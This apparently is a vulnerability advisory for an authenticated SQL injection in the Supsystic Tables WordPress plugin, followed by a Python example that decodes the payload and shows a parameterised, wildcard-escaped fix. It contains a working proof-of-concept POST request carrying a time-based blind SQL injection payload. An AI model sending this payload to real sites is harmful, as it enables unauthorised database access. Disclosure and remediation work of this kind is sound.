The POST parameter "data[search][text_like]" was used in a SQL statement without being sanitised when searching for Tables in the dashboard, leading to an authenticated SQL Injection issue.
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
User-Agent: YOLO
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://example.com/wp-admin/admin.php?page=supsystic-tables&module=tables&nonce=6cda51eefd
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 336
Origin: https://example.com
Connection: close
Cookie: [admin cookies]

route%5Bmodule%5D=tables&route%5Baction%5D=getListForTbl&route%5Bnonce%5D=6cda51eefd&data%5Bsearch%5D%5Btext_like%5D=aa'%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)%20AND%20'42'='42&data%5B_search%5D=false&data%5Bnd%5D=1612792425884&data%5Brows%5D=10&data%5Bpage%5D=0&data%5Bsidx%5D=id&data%5Bsord%5D=desc&action=supsystic-tables
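The following is an added example, not the plugin's code or the advisory author's: it decodes the `data[search][text_like]` value from the request above and contrasts a concatenated LIKE query with a bound, wildcard-escaped one. The table name `demo_tables`, the sample rows and all function names are assumptions, and SQLite stands in for the site's MySQL database.

```python
import sqlite3
from urllib.parse import parse_qs

# Search-related fields of the request body shown above (copied from the page).
BODY = ("route%5Bmodule%5D=tables&route%5Baction%5D=getListForTbl"
        "&data%5Bsearch%5D%5Btext_like%5D=aa'%20AND%20(SELECT%2042%20FROM%20"
        "(SELECT(SLEEP(5)))b)%20AND%20'42'='42&action=supsystic-tables")

def search_term(body):
    """Return the decoded data[search][text_like] value from a form body."""
    return parse_qs(body)["data[search][text_like]"][0]

def concatenated_sql(term):
    """Unsafe pattern (assumed shape): the value is pasted inside the LIKE literal."""
    return "SELECT id, title FROM demo_tables WHERE title LIKE '%" + term + "%'"

def escape_like(term, esc="\\"):
    """Escape LIKE wildcards so user input only ever matches literally."""
    for ch in (esc, "%", "_"):
        term = term.replace(ch, esc + ch)
    return term

def safe_search(db, term):
    """Hardened pattern: the value travels as a bound parameter, never as SQL text."""
    sql = "SELECT id, title FROM demo_tables WHERE title LIKE ? ESCAPE '\\'"
    return db.execute(sql, ("%" + escape_like(term) + "%",)).fetchall()

def demo_db():
    """Constructed sample data standing in for the plugin's table list."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE demo_tables (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO demo_tables (title) VALUES (?)",
                   [("aa prices",), ("100% cotton",), ("staff",)])
    return db

if __name__ == "__main__":
    term = search_term(BODY)
    # The first quote in the value closes the literal, so the rest parses as SQL.
    print(concatenated_sql(term))
    db = demo_db()
    print(safe_search(db, term))   # the same value is only a string to match
    print(safe_search(db, "aa"))   # ordinary search still works
    print(safe_search(db, "%"))    # wildcard is matched literally
```

In WordPress code the same pattern is `$wpdb->prepare()` with a `%s` placeholder, with `$wpdb->esc_like()` applied to the search text before the surrounding `%` wildcards are added.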
2021-02-08 (about 2 years ago)
2021-02-08 (about 2 years ago)
2021-02-10 (about 2 years ago)